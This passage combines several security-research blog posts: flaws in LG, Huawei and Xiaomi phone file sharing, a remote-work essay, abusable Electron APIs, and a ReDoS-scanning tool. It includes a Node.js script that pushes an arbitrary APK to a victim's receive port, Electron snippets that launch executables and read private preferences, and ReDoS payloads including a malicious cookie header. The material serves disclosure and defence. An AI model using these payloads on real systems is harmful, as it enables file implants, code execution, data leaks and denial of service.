<s:Envelope
    xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <s:Body>
        <u:CreateSendSession
            xmlns:u="urn:schemas-wifialliance-org:service:FileTransfer:1">
            <Transmitter>Doyensec LG G6 Phone</Transmitter>
            <SessionInformation>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;MetaInfo
                xmlns=&quot;urn:wfa:filetransfer&quot;
                xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;
                xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xsi:schemaLocation=&quot;urn:wfa:filetransfer http://www.wi-fi.org/specifications/wifidirectservices/filetransfer.xsd&quot;&gt;&lt;Note&gt;1 and 4292012bytes File Transfer&lt;/Note&gt;&lt;Size&gt;4292012&lt;/Size&gt;&lt;NoofItems&gt;1&lt;/NoofItems&gt;&lt;Item&gt;&lt;Name&gt;CuteCat.jpg&lt;/Name&gt;&lt;Size&gt;4292012&lt;/Size&gt;&lt;Type&gt;image/jpeg&lt;/Type&gt;&lt;/Item&gt;&lt;/MetaInfo&gt;
            </SessionInformation>
        </u:CreateSendSession>
    </s:Body>
</s:Envelope>

The SessionInformation node embeds an entity-escaped standard Wi-Fi Alliance schema, urn:wfa:filetransfer, transmitting a CuteCat.jpg picture. The file name (MetaInfo/Item/Name) is displayed in the file transfer prompt to show to the final recipient the name of the transmitted file. By design, after the recipient’s confirmation, a CreateSendSessionResponse SOAP response will be returned:

HTTP/1.1 200 OK
Date: Sun, 01 Jun 2020 12:00:00 GMT
Connection: Keep-Alive
Content-Type: text/xml; charset="utf-8"
Content-Length: 404
EXT: 
SERVER: UPnPServer/1.0 UPnP/1.0 Mobile/1.0
 
<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope
    xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <s:Body>
        <u:CreateSendSessionResponse
            xmlns:u="urn:schemas-wifialliance-org:service:FileTransfer:1">
            <SendSessionID>33</SendSessionID>
            <TransportInfo>tcp:55432</TransportInfo>
        </u:CreateSendSessionResponse>
    </s:Body>
</s:Envelope>

This will contain the TransportInfo destination port that will be used for the final transfer:

PUT /CuteCat.jpeg HTTP/1.1
User-Agent: LGMobile
Host: 192.168.49.1:55432
Content-Length: 4292012
Connection: Keep-Alive
Content-Type: image/jpeg

.... .Exif..MM ...<redacted>

What could go wrong?

Unfortunately this design suffers many issues, such as:

  • A valid session ID isn’t required to finalize the transfer
    Once a CreateSendSessionResponse is issued, no authentication is required to push a file to the opened RX port. Since the DEFAULT_HTTPSERVER_PORT for the receiver is hardcoded to be 55432, any application running on the sender’s or recipient’s device can hijack the transfer and push an arbitrary file to the victim’s storage, just by issuing a valid PUT request (see the sketch after this list). On top of that, the current Session IDs are easily guessable, since they are randomly chosen from a small pool (WfdsUtil.randInt(1, 100)).
  • File names and type can be arbitrarily changed by the sender
    Since the transferred file name is never checked to reflect the one initially prompted to the user, it is possible for an attacker to specify a different file name or type from the one initially shown just by changing the PUT request path to an arbitrary value.
  • It is possible to send multiple files at once without user confirmation
    Once the RX port (DEFAULT_HTTPSERVER_PORT) is opened, it is possible for an attacker to send multiple files in a single transaction, without prompting any notification to the recipient.

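The first of these issues can be sketched in a few lines of code. Once the receiver has accepted a transfer and opened the hardcoded RX port, any local app can race the legitimate sender and push its own payload. The snippet below is a rough illustration (the file name, content and use of Node.js are our own choices, not LG’s API):

const http = require('http');
const fs = require('fs');

// Attacker-chosen payload, pushed to the receiver's hardcoded RX port (55432)
// as soon as a transfer session has been accepted.
const payload = fs.readFileSync('./malicious.apk');
const req = http.request({
  host: '192.168.49.1',
  port: 55432,                  // DEFAULT_HTTPSERVER_PORT, hardcoded
  method: 'PUT',
  path: '/TotallyACuteCat.apk', // never validated against the name shown in the prompt
  headers: {
    'Content-Type': 'application/vnd.android.package-archive',
    'Content-Length': payload.length
  }
}, (res) => console.log('receiver answered', res.statusCode));
req.end(payload);
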
Because of the above design issues, any malicious third-party application installed on one of the peers’ devices may influence or take over any communication initiated by the legitimate LG SmartShare applications, potentially hijacking legitimate file transfers. A wormable malicious application could abuse this insecure design to flood a local or remote victim waiting for a file transfer, effectively propagating its malicious APK without requiring any user interaction. An attacker could also abuse this design to implant arbitrary files or evidence on a victim’s device.


Huawei Share

Huawei Share is another file sharing solution included in Huawei’s EMUI operating system, supporting both Huawei terminals and those of its second brand, Honor.

In Huawei Share, an FTS (FTSService in com.huawei.android.wfdft.fts) and an FTC (FTCService in com.huawei.android.wfdft.ftc) are spawned and listening on ports 8058 and 33003. On a high level, the Share protocol resembles the LG SmartShare Beam mechanism, but without the same design flaws.

Unfortunately, the stumbling block for Huawei Share is the stability of its services: we identified multiple HTTP requests that could crash the FTCService or the FTSService. Since the crashes can be triggered by any third-party application installed on the user’s device, and because of the UPnP General Event Notification Architecture (GENA) design itself, an attacker can still take over any communication initiated by the legitimate Huawei Share applications, stealing Session IDs and hijacking file transfers.

Abusing FTS/FTC Crashes

In the replicated attack scenario, Alice and Bob’s devices are connected and paired on a Direct Wi-Fi connection. Bob also unwittingly runs a malicious application with little or no privileges on his device. In this scenario, Bob initiates a file share through Huawei Share (step 1). His legitimate application will, therefore, send a CreateSession SOAP action through a POST request to Alice’s FTCService to get a valid SessionID, which will be used as an authorization token for the rest of the transaction. During a standard exchange, after Alice accepts the transfer on her device, a file share event notification (NOTIFY /evetSub) will fire to Bob’s FTSService. The FTSService will then be used to serve the intended file.

NOTIFY /evetSub HTTP/1.1
Content-Type: text/xml; charset="utf-8"
HOST: 192.168.49.1
NT: upnp:event
NTS: upnp:propchange
SID: uuid:e9400170-a170-15bd-802e-165F9431D43F
SEQ: 1
Content-Length: 218
Connection: close
 
<?xml version="1.0" encoding="utf-8"?>
<e:propertyset xmlns:e="urn:schemas-upnp-org:event-1-0">
   <e:property>
      <TransportStatus>1924435235:READY_FOR_TRANSPORT</TransportStatus>
   </e:property>
</e:propertyset>

Since an inherent time span exists between the manual acceptance of the transfer by Alice and its start, the malicious application could perform a request with an ad-hoc payload to trigger a crash of the FTSService (step 2) and subsequently bind its own fake FTSService to the same port (step 3). Because of the UPnP event subscription and notification protocol design, the NOTIFY event including the SessionID (1924435235 in the example above) can now be intercepted by the fake FTSService (step 4) and used by the malicious application to serve arbitrary files.

The crashes are undetectable both to the device’s user and to the file recipient. Multiple crash vectors using malformed requests were identified, making the service systemically weak and exploitable.


Xiaomi Mi Share

Introduced with MIUI 11, Xiaomi’s MiShare offers AirDrop-like file transfer features between Mi and Redmi phones. Recently this feature was extended to be compatible with devices produced by the “Peer-to-Peer Transmission Alliance” (including vendors with over 400M users such as Xiaomi, OPPO, Vivo, Realme, Meizu).

Due to this transition, MiShare internally features two different sets of APIs:

  • One using bare HTTP requests, with many RESTful routes
  • One using mainly Websockets Secure (WSS) and only a handful of HTTPS requests

The websocket-based API is currently used by default for transfers between Xiaomi Devices and this is the one we assessed. As in other P2P solutions, several minor design and implementation bugs were identified:

  • The JSON-encoded parcel sent via WSS specifying the file properties is trusted and its fileSize parameter is used to check if there is available space on the device left. Since this is the sender’s declared file size, a Denial of Service (DoS) exhausting the remaining space is possible.

  • Session tokens (taskId) are 19-digits long and a weak source of entropy (java.util.Random) is used to generate them.

  • Just like the other presented vendor solutions, any third-party application installed on the user’s device can meddle with MiShare’s exchange. While several DoS payloads crashing MiShare are also available, for this vendor the file transfer service is restarted very quickly, making the window of opportunity for an attack very limited.

On a brighter note, the Mi Share protocol design was hardened using per-session TLS certificates when communicating through WSS and HTTPS, limiting the exploitability of many security issues.


Conclusions

Some of the attacks described can be easily replicated in other existing mobile file transfer solutions. While the core technology has always been there, OEMs still struggle to defend their own P2P sharing flavors. Other common vulnerabilities found in the past include similar improper access control issues, path traversals, XML External Entity (XXE), improper file management, and monkey-in-the-middle (MITM) of the connection.

All vulnerabilities briefly described in this post were responsibly disclosed to the respective OEM security teams between April and June 2020.

Psychology of Remote Work

16 December 2020 at 23:00

This is the first in a series of non-technical blog posts aiming at discussing the opportunities and challenges that arise when running a small information security consulting company. After all, day to day life at Doyensec is not only about computers and stories of breaking bits.

The pandemic has deeply affected standard office work and forced us to immediately change our habits. In all probability, no one could have predicted that suddenly the office was going to be “moved”, and the new location is a living room. Remote work has been a hot topic for many years, however the current situation has certainly accelerated the adoption and forced companies to make a change.

At Doyensec, we’ve been a 100% remote company since day one. In this blog post, we’d like to present our best practices and also list some of the myths which surround the idea of remote work. This article is based on our personal experience and will hopefully help the reader to work at home more efficiently. There are no magic recipes here, just a collection of things that work for us.

5 standard rules we follow and 7 myths that we believe are false

Illustration

Five Golden Rules

1. “Work” separated from the “Home” zone

The most effective solution is to work in a separate and dedicated room, which automatically becomes your office. It is important to somehow physically separate the workplace from the rest of the house, e.g. with a screen, small bookcase or curtain. The worst thing you can do is work on the couch or bed where you usually rest. We try not to review source code from the place where we normally eat snacks, or debug an application in the same place we sleep. If possible, work at a desk. It will also be easier for you to mobilize yourself for a specific activity. Also, make sure that your household, especially your young children, do not play in your “office area”. It will be best if this “home office space” belongs exclusively to you.

2. The importance of a workplace

Prepare a desk with adequate lighting and a comfortable chair. We emphasize the need for a functional, ergonomic chair, and not simply an armchair. It’s about working effectively. The time to relax will come later. Arrange everything so that you work with ease. Notebooks and other materials should be tidied up on the desk and kept neat. This will be a clear, distinguishing feature of the work place. Family members should know that this is a work area from the way it looks. It will be easier for them to get used to the fact that instead of “going to work,” work related responsibilities will be performed at home. Also, this setup gives an opportunity to make security testing more efficient - for example by setting up bigger screens and ready to use testing equipment.

3. Control your time (establish a routine)

A flexible working time can be treacherous. There are times when an eight hour working day is sufficient to complete an important project. On the other hand, there are situations where various distractions can take attention away from an assigned task. In order to avoid this type of scenario, fixed working hours must be established. For example, some Doyensec employees use BeFocused and Timing apps to regulate their time. Intuitive and user friendly applications will help you balance your private and professional life and will also remind you when it’s time to take a break. Working long hours with no breaks is the main source of burnout.

4. Find excuses to leave your house (vary the routine)

Traditional work is usually based on a structured day spent in an office environment. The day is organized into work sessions and breaks. When working at home, on the other hand, time must be allotted for non-work related responsibilities on a more subjective basis. It is important for the routine to be elastic enough to include breaks for everything from physical activity (walks) to shopping (groceries) and social interaction. Leaving the house regularly is very beneficial. A break will bring on a refreshed perspective. The current pandemic is obviously the reason why people spend more time inside. Outside physical activities are very important to keep our minds fresh and a set of new endorphins is always welcome. As proof of evidence, our best bugs are usually discovered after a run or a walk outside!

5. Avoid distractions

While this sounds like simple and intuitive advice, avoiding distractions is actually really difficult! In general it’s good to turn off notifications on your computer or phone, especially while working. We trust our people and they don’t have to be immediately 100% reachable when working. As long as our consultants provide updates and results when needed, it is perfectly fine to shutdown email and other communication channels. Depending on personal preference, some individuals require complete silence, while others can accomplish their work while listening to music. If you belong to that category of people who cannot work in absolute silence and normal music levels are too intense, consider using white noise. There are applications available that you can use to create a neutral soundtrack that helps you to concentrate. You can easily follow our recommendation on Spotify: something calm, maybe jazz style or classy.

FactMyth

Seven Myths

Let’s now talk about some myths related to remote work:

1. Remote employees have no control over projects

At Doyensec, we have successfully delivered hundreds of projects that were done exclusively remotely. If we are delivering a small project, we usually allocate one security researcher who is able to start the project from scratch and deliver a high quality deliverable, but sometimes we have 2-3 consultants working on the same engagement and the outcome is of the same quality. Most of our communication goes through (PGP-encrypted) emails. An instant messenger can help a great deal when answers are needed quickly. The real challenge is in hiring the right people who can control the project regardless of their physical location. While employing people for our company, we look at both technical and project management skills. According to Jason Fried and Davis Heinemeier Hansson, 37 Signal co-founders, you shouldn’t hire people you don’t trust (Remote). We totally agree with this statement.

2. Remote employees cannot learn from colleagues

The obvious fact is that it is easier to learn when a colleague is physically in the same office and not on the other side of the screen, but we have learned to deal with this problem. Part of our organizational culture is a “screen sharing session” where two people working on the same project analyze source code and look for vulnerabilities together. During our weekly meetings, we also organize a session called “best bugs” where we all share the most interesting findings from a given week.

3. Remote work = lack of work & life balance?

If a person is not able to organize his/her work day properly, it is easy to drag out the work day from early in the morning to midnight instead of completing everything within the expected eight hours. Self discipline and iterative improvements are the key solutions for an effective day. Work/life balance is important, but who said that forcing a 9am-5pm schedule is the best way to work? Wouldn’t it be better to visit a grocery store or a gym in the middle of the day when no one is around and finish work in the evening?

4. Employees not under control

Healthy remote companies rely on trust. If they didn’t then they wouldn’t offer remote work opportunities in the first place. People working at home carry out their duties like everyone else. In fact, planning activities such as gym-workouts, family time, and hobbies is much easier thanks to the flexible schedule. You can freely organize your work day around important family matters or other responsibilities if necessary.

Companies should be focused on having better hiring processes and ensuring long-term retention instead of being over concerned about the risk of “remote slacking”. In fact, our experience in the past four years would actually suggest that it is more challenging to ensure a healthy work/life balance since our researchers are sufficiently motivated and love what they do.

5. Remote work means working outside the employer’s office

It should be understood that not all remote work is the same. If you work in customer service and receive regular calls from customers, for example, you might be working from a confined space in a separate room at home. Remote work means working outside the employer’s office. It can mean working in a co-working space, cafeteria, hotel or any other place where you have a good Internet connection.

6. Remote work is lonely

This one is a bit tricky since it’s technically true and false. It’s true that you usually sit at home and work alone, but in our security work we’re constantly exchanging information via e-mails, Mattermost, Signal, etc. We also have Hangouts video meetings where we can sync up. If someone feels personally isolated, we always recommend signing up for some activities like a gym, book club or other options where like-minded people associate. Lonely individuals are less productive over the long run. Compared to the traditional office model, remote work requires looking for friends and colleagues outside the company - which isn’t a bad thing after all.

7. Remote work is for everyone

We strongly believe that there are people who will still prefer an onsite job. Some individuals need constant contact with others. They also prefer the standard 9am-5pm work schedule. There is nothing wrong with that. People that are working remotely have to make more decisions on their own and need stronger self-discipline. Since they are unable to engage in direct consultation with co-workers, a reduction of direct communication occurs. Nevertheless, remote work will become something “normal” for an increasing number of people, especially for the Y and Z generation.

Electron APIs Misuse: An Attacker’s First Choice

15 February 2021 at 23:00

ElectronJs is getting more secure every day. Context isolation and other security settings are planned to become enabled by default with the upcoming release of Electron 12 stable, seemingly ending the somewhat deserved reputation of a systemically insecure framework.

Seeing such significant and tangible progress makes us proud. Over the past years we’ve committed to helping developers secure their applications by researching different attack surfaces.

As confirmed by the Electron development team with the v11 stable release, new major versions of Electron (including new versions of Chromium, Node, and V8) are planned approximately quarterly. Such an ambitious release schedule will also increase the number and frequency of newly introduced APIs, planned breaking changes, and consequent security nuances in upcoming versions. While new functionality is certainly desirable, new framework APIs may also expose powerful interfaces to OS features, which developers may more or less inadvertently enable, lured by the syntactic sugar Electron provides.

Electron Hardened

Such interfaces may be exposed to the renderer, either through preloads or insecure configurations, and can be abused by an attacker beyond their original purpose. An infamous example of this is openExternal.

Shell’s openExternal() allows opening a given external protocol URI with the desktop’s native utilities. For instance, on macOS, this function is similar to the open terminal command utility and will open the specific application based on the URI and filetype association. When openExternal is used with untrusted content, it can be leveraged to execute arbitrary commands, as demonstrated by the following example:

const {shell} = require('electron') 
shell.openExternal('file:///System/Applications/Calculator.app')

Similarly, shell.openPath(path) can be used to open the given file in the desktop’s default manner.

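A minimal sketch, with an illustrative path (on macOS, pointing it at an application bundle effectively launches it):

const { shell } = require('electron')
// The target is opened with its default handler, much like double-clicking it
// in the file manager.
shell.openPath('/System/Applications/Calculator.app')
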
From an attacker’s perspective, Electron-specific APIs are very often the easiest path to gain remote code execution, read or write access to the host’s filesystem, or leak sensitive user’s data. Malicious JavaScript running in the renderer can often subvert the application using such primitives.

With this in mind, we gathered a non-comprehensive list of APIs we successfully abused during our past engagements. When exposed to the user in the renderer, these APIs can significantly affect the security posture of Electron-based applications and facilitate nodeIntegration / sandbox bypasses.

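The snippets in the following sections reference a Native object in the renderer. That object is not an Electron built-in: it stands for whatever bridge the vulnerable application exposes, for instance through an insecure preload along these lines (a hypothetical example, assuming contextIsolation is disabled and the remote module is enabled):

// preload.js - insecure pattern: with contextIsolation disabled, anything
// attached to window becomes reachable from untrusted renderer content.
const { remote } = require('electron')

window.Native = {
  app: remote.app,                            // full application lifecycle control
  systemPreferences: remote.systemPreferences // system preferences and events
}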

Remote.app

The remote module provides a way for the renderer processes to access APIs normally only available in the main process. In Electron, GUI-related modules (such as dialog, menu, etc.) are only available in the main process, not in the renderer process. In order to use them from the renderer process, the remote module is necessary to send inter-process messages to the main process.

While this seems pretty useful, this API has been a source of performance and security troubles for quite a while. As a result of that, the remote module will be deprecated in Electron 12, and eventually removed in Electron 14.

Despite the warnings and numerous articles on the topic, we have seen a few applications exposing Remote.app to the renderer. The app object controls the full application’s event lifecycle and it is basically the heart of every Electron-based application.

Many of the functions exposed by this object can be easily abused.

Taking app.relaunch([options]) as an example, it can be used to relaunch the app when the current instance exits. Using this primitive, it is possible to specify a set of options, including an execPath property that will be executed for the relaunch instead of the current app, along with a custom args array that will be passed as command-line arguments. This functionality can be easily leveraged by an attacker to execute arbitrary commands.

Native.app.relaunch({args: [], execPath: "/System/Applications/Calculator.app/Contents/MacOS/Calculator"});
Native.app.exit()

Note that the relaunch method alone does not quit the app when executed, and it is also necessary to call app.quit() or app.exit() after calling the method to make the app restart.

systemPreferences

Another frequently exported module is systemPreferences. This API is used to get system preferences and emit system events, and can therefore be abused to leak multiple pieces of information about the user’s behavior and their operating system activity and usage patterns. The metadata extracted through the module could then be abused to mount targeted attacks.

subscribeNotification, subscribeWorkspaceNotification

These methods can be used to subscribe to native macOS notifications. Under the hood, this API subscribes to NSDistributedNotificationCenter. Before macOS Catalina, it was possible to register a global listener and receive all distributed notifications by invoking the CFNotificationCenterAddObserver function with nil for the name parameter (corresponding to the event parameter of subscribeNotification). The specified callback would then be invoked any time a distributed notification was broadcast by any app. On macOS Catalina and Big Sur, sandboxed applications can still globally sniff distributed notifications by registering to receive any notification by name. As a result, many sensitive events can be sniffed, including but not limited to:

  • Screen locks/unlocks
  • Screen saver start/stop
  • Bluetooth activity/HID Devices
  • Volume (USB, etc) mount/unmount
  • Network activity
  • User file downloads
  • Newly Installed Applications
  • Opened Source Code Files
  • Applications in Use
  • Loaded Kernel Extensions
  • …and more from installed applications, including any sensitive information they broadcast. Distributed notifications are public by design, and it was never correct to put sensitive information in them.

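As a minimal sketch, a renderer with access to the module could register for one of the events above (the notification name is the standard macOS one for screen locks; the Native bridge is the hypothetical preload shown earlier):

// Sniff macOS screen-lock events from the renderer.
const id = Native.systemPreferences.subscribeNotification(
  'com.apple.screenIsLocked',
  (event, userInfo) => console.log('victim locked the screen', event, userInfo)
)
// In recent Electron versions the returned id can later be passed to
// Native.systemPreferences.unsubscribeNotification(id) to stop the sniffing.
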
The latest NSDistributedNotificationCenter API also seems to have intermittent problems with Big Sur and sandboxed applications, so we expect to see more breaking changes in the future.

getUserDefault, setUserDefault

The getUserDefault function returns the value of a key in NSUserDefaults, a simple macOS storage class that provides a programmatic interface for interacting with the defaults system. This systemPreferences method can be abused to read the application’s or the global preferences. An attacker may abuse the API to retrieve sensitive information including the user’s location and filesystem resources. As a demonstration, getUserDefault can be used to obtain personal details of the targeted application user:

  • User’s most recent locations on the file system
    > Native.systemPreferences.getUserDefault("NSNavRecentPlaces","array")
    (5) ["/tmp/secretfile", "/tmp/SecretResearch", "~/Desktop/Cellar/NSA_files", "/tmp/blog.doyensec.com/_posts", "~/Desktop/Invoices"]
    
  • User’s selected geographic location
    Native.systemPreferences.getUserDefault("com.apple.TimeZonePref.Last_Selected_City","array")
    (10) ["48.40311", "11.74905", "0", "Europe/Berlin", "DE", "Freising", "Germany", "Freising", "Germany", "DEPRECATED IN 10.6"]
    

Complementarily, the setUserDefault method can be weaponized to set user defaults for the application preferences related to the target application. Before Electron v8.3.0 [1], [2], these methods could only get or set NSUserDefaults keys in the standard suite.

Shell.showItemInFolder

A subtle example of a potentially dangerous native Electron primitive is shell.showItemInFolder. As the name suggests, this API shows the given file in a file manager.

shell.showItemInFolder

Such seemingly innocuous functionality hides some peculiarities that could be dangerous from a security perspective.

On Linux (/shell/common/platform_util_linux.cc), Electron extracts the parent directory name, checks if the resulting path is actually a directory and then uses XDGOpen (xdg-open) to show the file in its location:

void ShowItemInFolder(const base::FilePath& full_path) {
  base::FilePath dir = full_path.DirName();
  if (!base::DirectoryExists(dir))
    return;

  XDGOpen(dir.value(), false, platform_util::OpenCallback());
}

xdg-open can be leveraged for executing applications on the victim’s computer.

“If a file is provided the file will be opened in the preferred application for files of that type” (https://linux.die.net/man/1/xdg-open)

Because of the inherent time-of-check to time-of-use (TOCTOU) condition caused by the time difference between the directory existence check and its launch with xdg-open, an attacker could run an executable of their choice by replacing the folder path with an arbitrary file, winning the race introduced by the check. While this issue is rather tricky to exploit in the context of an insecure Electron renderer, it is certainly a potential step in a more complex vulnerability chain.

On Windows (/shell/common/platform_util_win.cc), the situation is even more tricky:

void ShowItemInFolderOnWorkerThread(const base::FilePath& full_path) {
...
  base::win::ScopedCoMem<ITEMIDLIST> dir_item;
  hr = desktop->ParseDisplayName(NULL, NULL,
                                 const_cast<wchar_t*>(dir.value().c_str()),
                                 NULL, &dir_item, NULL);

  const ITEMIDLIST* highlight[] = {file_item};
  hr = SHOpenFolderAndSelectItems(dir_item, base::size(highlight), highlight,
                                  NULL);
...
 if (FAILED(hr)) {
 	if (hr == ERROR_FILE_NOT_FOUND) {
      ShellExecute(NULL, L"open", dir.value().c_str(), NULL, NULL, SW_SHOW);
    } else {
      LOG(WARNING) << " " << __func__ << "(): Can't open full_path = \""
                   << full_path.value() << "\""
                   << " hr = " << logging::SystemErrorCodeToString(hr);
    }
  }
}

Under normal circumstances, the SHOpenFolderAndSelectItems Windows API (from shlobj_core.h) is used. However, Electron introduced a fall-back mechanism, as the call mysteriously fails with a “file not found” exception on old Windows systems. In these cases, ShellExecute is used as a fallback, specifying “open” as the lpVerb parameter. According to the Windows Shell documentation, the “open” verb launches the specified file or application. If this file is not an executable file, its associated application is launched.

While the exploitability of these quirks is up for discussion, these examples showcase how innocuous APIs might introduce OS-dependent security risks. In fact, Chromium has refactored the code in question to avoid the use of xdg-open altogether and leverage D-Bus instead.


The Electron APIs illustrated in this blog post are just a few notable examples of potentially dangerous primitives that are available in the framework. As Electron will become more and more integrated with all supported operating systems, we expect this list to increase over time. As we often repeat, know your framework (and its limitations) and adopt defense in depth mechanisms to mitigate such deficiencies.

As a company, we will continue to devote our 25% research time to secure the ElectronJS ecosystem and improve Electronegativity.

Regexploit: DoS-able Regular Expressions

10 March 2021 at 23:00

When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS) where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is in the misuse of regular expressions (regexes).

Regular expressions are used for all manner of text-processing tasks. They may seem to run fine, but if a regex is vulnerable to Regular Expression Denial of Service (ReDoS), it may be possible to craft input which causes the CPU to run at 100% for years.

In this blog post, we’re releasing a new tool to analyse regular expressions and hunt for ReDoS vulnerabilities. Our heuristic has been proven to be extremely effective, as demonstrated by many vulnerabilities discovered across popular NPM, Python and Ruby dependencies.

Check your regexes with Regexploit

🚀 @doyensec/regexploit - pip install regexploit and find some bugs.

Backtracking

To get into the topic, let’s review how the regex matching engines in languages like Python, Perl, Ruby, C# and JavaScript work. Let’s imagine that we’re using this deliberately silly regex to extract version numbers:

(.+)\.(.+)\.(.+)

That will correctly process something like 123.456.789, but it’s a pretty inefficient regex. How does the matching process work?

The first .+ capture group greedily matches all the way to the end of the string as dot matches every character.

123.456.789

$1="123.456.789". The matcher then looks for a literal dot character. Unable to find it, it tries removing one character at a time from the first .+

123.456.789

until it successfully matches a dot - $1="123.456"

123.456.789

The second capture group matches the final three digits $2="789", but we need another dot so it has to backtrack.

123.456.789

Hmmm… it seems that maybe the match for capture group 1 is incorrect, let’s try backtracking.

123.456.789

OK let’s try with $1="123", and let’s match group 2 greedily all the way to the end.

123.456.789

$2="456.789" but now there’s no dot! That can’t be the correct group 2…

123.456.789

Finally we have a successful match: $1="123", $2="456", $3="789"

As you can hopefully see, there can be a lot of back-and-forth in the regex matching process. This backtracking is due to the ambiguous nature of the regex, where input can be matched in different ways. If a regex isn’t well-designed, malicious input can cause a much more resource-intensive backtracking loop than this.

If backtracking takes an extreme amount of time, it will cause a Denial of Service, such as what happened to Cloudflare in 2019. In runtimes like NodeJS, the Event Loop will be blocked which stalls all timers, awaits, requests and responses until regex processing completes.

ReDoS example

Now we can look at a ReDoS example. The ua-parser package contains a giant list of regexes for deciphering browser User-Agent headers. One of the regular expressions reported in CVE-2020-5243 was:

; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)

If we look closer at the end part we can see three overlapping repeating groups:

\d+[^\);]+[^\);]*\)

Digit characters are matched by \d and by [^\);]. If a string of N digits enters that section, there are ½(N-1)N possible ways to split it up between the \d+, [^\);]+ and [^\);]* groups. The key to causing ReDoS is to supply input which doesn’t successfully match, such as by not ending our malicious input with a closing parenthesis. The regex engine will backtrack and try all possible ways of matching the digits in the hope of then finding a ).

This visualisation of the matching steps was produced by emitting verbose debugging from cpython’s regex engine using my cpython fork.

Regexploit

Today, we are releasing a tool called Regexploit to extract regexes from code, scan them and find ReDoS.

Several tools already exist to find regexes with exponential worst case complexity (regexes of the form (a+)+b), but cubic complexity regexes (a+a+a+b) can still be damaging. Regexploit walks through the regex and tries to find ambiguities where a single character could be captured by multiple repeating parts. Then it looks for a way to make the regular expression not match, so that the regex engine has to backtrack.

The regexploit script allows you to enter regexes via stdin. If the regex looks OK it will say “No ReDoS found”. With the regex above it shows the vulnerability:

Worst-case complexity: 3 ⭐⭐⭐ (cubic)
Repeated character: [[0-9]]
Example: ';0 Build/HuaweiA' + '0' * 3456

The final line of output gives a recipe for creating a User-Agent header which will cause ReDoS on sites using old versions of ua-parser, likely resulting in a Bad Gateway error.

User-Agent: ;0 Build/HuaweiA0000000000000000000000000000...
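
To get a feel for the cubic growth locally, here is a rough Python sketch (absolute timings depend on the machine and interpreter) which times the vulnerable pattern against payloads of increasing length:

import re
import time

# The vulnerable ua-parser pattern from CVE-2020-5243, reproduced for illustration
HUAWEI = re.compile(r'; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)')

for n in (100, 200, 400):
    payload = ';0 Build/HuaweiA' + '0' * n   # no closing ')' so the match must fail
    start = time.perf_counter()
    HUAWEI.search(payload)
    print(f"{n:4d} digits -> {time.perf_counter() - start:.2f}s")
    # doubling the number of digits multiplies the runtime by roughly 8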

To scan your source code, there is built-in support for extracting regexes from Python, JavaScript, TypeScript, C#, JSON and YAML. If you are able to extract regexes from other languages, they can be piped in and analysed.

Once a vulnerable regular expression is found, it does still require some manual investigation. If it’s not possible for untrusted input to reach the regular expression, then it likely does not represent a security issue. In some cases, a prefix or suffix might be required to get the payload to the right place.

ReDoS Survey

So what kind of ReDoS issues are out there? We used Regexploit to analyse the top few thousand npm and pypi libraries (grabbed from the libraries.io API) to find out.

[diagram: Libraries.io → pypi / npm downloader → Regexploit (regexploit-py / regexploit-js) → ReDoS triage]

We tried to exclude build tools and test frameworks, as bugs in these are unlikely to have any security impact. When a vulnerable regex was found, we then needed to figure out how untrusted input could reach it.

Results

The most problematic area was the use of regexes to parse programming or markup languages. Using regular expressions to parse some languages e.g. Markdown, CSS, Matlab or SVG is fraught with danger. Such languages have grammars which are designed to be processed by specialised lexers and parsers. Trying to perform the task with regexes leads to overly complicated patterns which are difficult for mere mortals to read.

A recurring source of vulnerabilities was the handling of optional whitespace. As an example, let’s take the Python module CairoSVG which used the following regex:

rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)

$ regexploit-py .env/lib/python3.9/site-packages/cairosvg/
Vulnerable regex in .env/lib/python3.9/site-packages/cairosvg/colors.py #190
Pattern: rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)
Context: RGBA = re.compile(r'rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)')
---
Starriness: 3 ⭐⭐⭐ (cubic)
Repeated character: [20,09,0a,0d]
Example: 'rgba(' + ' ' * 3456

The developer wants to find strings like rgba(   100,200, 10, 0.5   ) and extract the middle part without surrounding spaces. Unfortunately, the .+ in the middle also accepts spaces. If the string does not end with a closing parenthesis, the regex will not match, and we can get O(n³) backtracking.

Let’s take a look at the matching process with the input "rgba(" + " " * 19:

What a load of wasted CPU cycles!

A fun ReDoS bug was discovered in cpython’s http.cookiejar with this gorgeous regex:

Pattern: ^
    (\d\d?)            # day
       (?:\s+|[-\/])
    (\w+)              # month
        (?:\s+|[-\/])
    (\d+)              # year
    (?:
          (?:\s+|:)    # separator before clock
       (\d\d?):(\d\d)  # hour:min
       (?::(\d\d))?    # optional seconds
    )?                 # optional clock
       \s*
    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
       \s*
    (?:\(\w+\))?       # ASCII representation of timezone in parens.
       \s*$
Context: LOOSE_HTTP_DATE_RE = re.compile(
---
Starriness: 3 ⭐⭐⭐
Repeated character: [SPACE]
Final character to cause backtracking: [^SPACE]
Example: '0 a 0' + ' ' * 3456 + '0'

It was used when processing cookie expiry dates like Fri, 08 Jan 2021 23:20:00 GMT, but with compatibility for some deprecated date formats. The last 5 lines of the regex pattern contain three \s* groups separated by optional groups, so we have a cubic ReDoS.

A victim simply making an HTTP request like requests.get('http://evil.server') could be attacked by a remote server responding with Set-Cookie headers of the form:

Set-Cookie: b;Expires=1-c-1                        X

With the maximum 65506 spaces that can be crammed into an HTTP header line in Python, the client will take over a week to finish processing the header.

Again, the issue was designing the regex to handle whitespace between optional sections.

